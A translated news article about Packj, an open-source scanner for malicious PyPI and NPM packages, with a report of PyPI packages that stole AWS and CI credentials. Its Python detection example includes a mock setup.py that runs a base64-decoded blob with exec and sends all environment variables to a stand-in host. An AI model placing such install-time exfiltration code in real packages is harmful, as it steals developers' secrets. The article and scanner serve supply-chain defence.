Packj - a tool for identifying malicious libraries in Python and JavaScript

The developers of the Packj platform, which analyses the security of libraries, have released an open-source command-line toolkit that lets them identify risky constructs in packages that may be linked to malicious activity or to the presence of vulnerabilities exploited in attacks on projects that use the packages in question ("supply chain" attacks). Package analysis is supported for the Python and JavaScript languages, as hosted in the PyPi and NPM repositories (they also plan to add support for Ruby and RubyGems this month). The toolkit's code is written in Python and distributed under the AGPLv3 license.

During a check of 330 thousand packages in the PyPi repository using the described toolkit, 42 malicious packages containing backdoors and 2,400 risky packages were identified. During the check, static code analysis is performed to identify API usage patterns and to check for known vulnerabilities recorded in the OSV database. The MalOSS package is used for the API analysis. The package code is checked for the presence of typical constructs commonly used in malware. The patterns were prepared on the basis of a study of 330 packages with confirmed malicious activity.

It also identifies behaviour and metadata that raise the risk of misuse, such as executing code blocks via "eval" or "exec", generating new code at runtime, using code obfuscation techniques, manipulating environment variables, unintended file access, accessing network resources in installation scripts (setup.py), typosquatting (assigning names similar to those of well-known libraries), use of outdated and abandoned projects, specifying non-existent e-mail addresses and websites, and the absence of a public repository with the code.
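As an added illustration of the kind of static check the article describes (not Packj's own code; the rule set, the sample setup.py and the similarity threshold are constructed here), a small Python scanner that flags eval/exec, runtime code generation, encoded payloads, environment-variable access and network calls in an install script, plus a look-alike-name check for typosquatting:

```python
import ast
import difflib
# Constructed sample setup.py (not a real package): encoded payload, exec/compile
# at install time, and environment variables sent to a network endpoint.
SAMPLE_SETUP_PY = """\
import os, base64
import urllib.request
from setuptools import setup
blob = base64.b64decode("cHJpbnQoJ2hpJyk=")
exec(compile(blob, "<blob>", "exec"))
urllib.request.urlopen("https://example.invalid/", data=repr(dict(os.environ)).encode())
setup(name="loglib-modules")
"""
# Dotted call names mapped to the risk they indicate (hypothetical rule set, not Packj's).
RISKY_CALLS = {"eval": "dynamic code evaluation", "exec": "dynamic code execution",
               "compile": "runtime code generation", "base64.b64decode": "encoded payload decoding"}
NETWORK_MODULES = {"urllib", "requests", "socket", "http"}

def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_source(source, filename="setup.py"):
    """Statically scan Python source; return sorted (line, finding) tuples."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, RISKY_CALLS[name]))
            elif name and name.split(".")[0] in NETWORK_MODULES:
                findings.append((node.lineno, f"network access via {name}"))
        elif isinstance(node, ast.Attribute) and _dotted_name(node) == "os.environ":
            findings.append((node.lineno, "environment variable access"))
    return sorted(findings)

def typosquat_candidate(name, known_names, cutoff=0.85):
    """Return the well-known package name that `name` nearly matches, else None."""
    if name in known_names:
        return None  # an exact match is the real package, not a look-alike
    close = difflib.get_close_matches(name, known_names, n=1, cutoff=cutoff)
    return close[0] if close else None
```

Running scan_source on the sample reports five findings on lines 4 to 6; a plain setuptools script with only a setup() call reports none.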

In addition, it is worth noting that other security researchers identified five malicious packages in the PyPi repository that sent the contents of environment variables to an external server with the aim of stealing AWS tokens and credentials for continuous integration systems: loglib-modules (passed off as modules for the official loglib library), pyg-modules, pygrata and pygrata-utils (passed off as extensions to the official pyg library), and hkg-sol-utils.


Source: opennet.ru
